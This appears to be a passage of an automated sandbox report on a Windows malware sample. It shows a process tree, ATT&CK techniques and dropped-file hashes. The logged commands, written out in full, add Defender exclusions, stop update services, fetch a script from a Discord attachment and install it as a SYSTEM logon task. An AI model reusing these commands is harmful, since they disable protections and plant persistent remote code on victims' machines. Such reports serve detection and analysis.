C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v231.exe"C:\Users\Admin\AppData\Roaming\a4t42sbh.v231.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v232.exe"C:\Users\Admin\AppData\Roaming\a4t42sbh.v232.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v233.exe"C:\Users\Admin\AppData\Roaming\a4t42sbh.v233.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E10.tmp\4E11.tmp\4E12.bat C:\Users\Admin\AppData\Roaming\a4t42sbh.v233.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 5EF4BD665E06E830674CC9A0A2A84A852⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 7A48BCB71A53F7CF5F2CA760348AE29D E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 931B725217D5403F48F0D7017C2BEAEE2⤵
- Loads dropped DLL
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 4888 -ip 48882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e57d014.rbsFilesize
823KB
MD518997887f9753201463ccf2bfdc60594
SHA146fbd6a0757c7b382457363a3dfc21119b2900fb
SHA2567a6f296f3415b1defd20d9384c89aabf8c927455ee68af0260e151e12ada59f3
SHA51207c1296c7c451d55870cc572f20024b3dd2f2fdbaf3c5dad403b1c7b72cc4937085c1da85cb930ad8e1dca63ed043c12088ca936bae97758bdfa0b943de5f9cb
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSEFilesize
11KB
MD5dfc1b916d4555a69859202f8bd8ad40c
SHA1fc22b6ee39814d22e77fe6386c883a58ecac6465
SHA2567b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9
SHA5121fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.jsFilesize
79B
MD524563705cc4bb54fccd88e52bc96c711
SHA1871fa42907b821246de04785a532297500372fc7
SHA256ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13
SHA5122ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9
-
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSEFilesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\licenseFilesize
1KB
MD5b862aeb7e1d01452e0f07403591e5a55
SHA1b8765be74fea9525d978661759be8c11bab5e60e
SHA256fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f
SHA512885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f
-
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\licenseFilesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.mdFilesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSEFilesize
780B
MD5b020de8f88eacc104c21d6e6cacc636d
SHA120b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA2563f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA5124220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38
-
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSEFilesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSEFilesize
802B
MD5d7c8fab641cd22d2cd30d2999cc77040
SHA1d293601583b1454ad5415260e4378217d569538e
SHA25604400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.jsFilesize
16KB
MD5bc0c0eeede037aa152345ab1f9774e92
SHA156e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA2567a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA5125f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.jsonFilesize
1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA5125221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSEFilesize
763B
MD57428aa9f83c500c4a434f8848ee23851
SHA1166b3e1c1b7d7cb7b070108876492529f546219f
SHA2561fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.jsonFilesize
28B
MD556368b3e2b84dac2c9ed38b5c4329ec2
SHA1f67c4acef5973c256c47998b20b5165ab7629ed4
SHA25658b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd
SHA512d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.jsonFilesize
26B
MD52324363c71f28a5b7e946a38dc2d9293
SHA17eda542849fb3a4a7b4ba8a7745887adcade1673
SHA2561bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4
SHA5127437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.jsFilesize
17KB
MD5cf8f16c1aa805000c832f879529c070c
SHA154cc4d6c9b462ad2de246e28cd80ed030504353d
SHA25677f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573
SHA512a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.jsFilesize
15KB
MD59841536310d4e186a474dfa2acf558cd
SHA133fabbcc5e1adbe0528243eafd36e5d876aaecaa
SHA2565b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9
SHA512b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.urlFilesize
133B
MD535b86e177ab52108bd9fed7425a9e34a
SHA176a1f47a10e3ab829f676838147875d75022c70c
SHA256afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA5123c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_0D7BFF9D231ADDC3439B70E4C5E809D4Filesize
404B
MD53e923d1e7d0d8a843e67fe831e0d28d4
SHA178f5c39a800427d3a5e200f312b6ac5d3b768408
SHA256feae2e8d6d3293d8a49b00e77b6bb2a9f07ff752ef0b70d027e5d8eaaf4f6d78
SHA512d94a186bba6efdfbc34b3d208f695d9041802faec2eb9fba8e38c576bc24f5b6d81603ff8f5d458562864d06eb0a650d10b2b8a610971d34845a2bf0c428748f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
C:\Users\Admin\AppData\Local\Temp\4CF7.tmp\4CF8.tmp\4CF9.batFilesize
6KB
MD545f6bf2d3c1c47e445439b805929aae8
SHA19d2ba518dd058559bc1d690019bbed79c7cd5f85
SHA256ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa
SHA512902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64
-
C:\Users\Admin\AppData\Local\Temp\4E10.tmp\4E11.tmp\4E12.batFilesize
1KB
MD52b49f09f8e1785bf2e5c79d0f2bc7389
SHA105d68482ab1db17e11fef25fae270c3b784000ae
SHA256706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279
SHA512ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a
-
C:\Users\Admin\AppData\Local\Temp\4E10.tmp\nodejs-installer.msiFilesize
25.3MB
MD50df081aa47e7159e585488a161a97466
SHA12dc9a592dbb208624aff11a57f97bea89a315973
SHA25620c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d
SHA5122e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3q3umny.utl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v230.exeFilesize
94KB
MD540208a80f2b2155185d8a5bac4b9c367
SHA1d7bf694f6046be8d6a882c86df12c1a35e26ab60
SHA256cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16
SHA5125ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v231.exeFilesize
355KB
MD5c93d65bc0ed7ee88d266b4be759301f8
SHA18c0c415ba824737c61904676e7132094f5710099
SHA256f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
SHA5127a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v232.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\AppData\Roaming\a4t42sbh.v233.exeFilesize
89KB
MD5a3b2fcf0c05bb385115894d38c2e6c44
SHA132cf50911381bbec1dad6aec06c2a741bd5d8213
SHA256dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1
SHA512fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2
-
C:\Windows\Installer\MSID3EA.tmpFilesize
125KB
MD5a6c7f0c329b28edb3e7f10d115d85c6d
SHA1f36faaf4af452ab0bcd30ef66de7291bcee21264
SHA2568f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03
SHA512d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf
-
C:\Windows\Installer\MSID4C7.tmpFilesize
390KB
MD580bebea11fbe87108b08762a1bbff2cd
SHA1a7ec111a792fd9a870841be430d130a545613782
SHA256facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1
SHA512a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
290B
MD572743136e667a3bb7cb08a361b26f3b2
SHA18050ef5804081c6170b08486ab9e1e5cf5f8b967
SHA2564975eae2ac500f113ee12e0e08bcba1c5b280a265851b2498ecc0ae9f8ac0848
SHA512e7cb62db78f6d39a2d85b254e6c82719ca5977ea7495d869e49b458289e5d2244e0660d31c7a9759844355dc380bf80cf33059c2c1ee5535853b182af955fe2e
-
memory/384-127-0x00007FFBCEBF0000-0x00007FFBCEC00000-memory.dmpFilesize
64KB
-
memory/384-125-0x000001AA77E70000-0x000001AA77E9B000-memory.dmpFilesize
172KB
-
memory/620-123-0x000002A58CDF0000-0x000002A58CE1B000-memory.dmpFilesize
172KB
-
memory/620-119-0x000002A58CDC0000-0x000002A58CDE4000-memory.dmpFilesize
144KB
-
memory/620-124-0x00007FFBCEBF0000-0x00007FFBCEC00000-memory.dmpFilesize
64KB
-
memory/672-131-0x00007FFBCEBF0000-0x00007FFBCEC00000-memory.dmpFilesize
64KB
-
memory/672-130-0x00000225A27B0000-0x00000225A27DB000-memory.dmpFilesize
172KB
-
memory/2116-42-0x0000000000DF0000-0x0000000000E5D000-memory.dmpFilesize
436KB
-
memory/2116-87-0x00007FFC0EB70000-0x00007FFC0ED65000-memory.dmpFilesize
2.0MB
-
memory/2116-91-0x0000000000DF0000-0x0000000000E5D000-memory.dmpFilesize
436KB
-
memory/2116-86-0x0000000003BC0000-0x0000000003FC0000-memory.dmpFilesize
4.0MB
-
memory/2116-85-0x0000000003BC0000-0x0000000003FC0000-memory.dmpFilesize
4.0MB
-
memory/2116-89-0x0000000075B30000-0x0000000075D45000-memory.dmpFilesize
2.1MB
-
memory/3220-96-0x0000000075B30000-0x0000000075D45000-memory.dmpFilesize
2.1MB
-
memory/3220-90-0x00000000009D0000-0x00000000009D9000-memory.dmpFilesize
36KB
-
memory/3220-93-0x0000000002820000-0x0000000002C20000-memory.dmpFilesize
4.0MB
-
memory/3220-94-0x00007FFC0EB70000-0x00007FFC0ED65000-memory.dmpFilesize
2.0MB
-
memory/3592-3368-0x00000274ADCE0000-0x00000274AE486000-memory.dmpFilesize
7.6MB
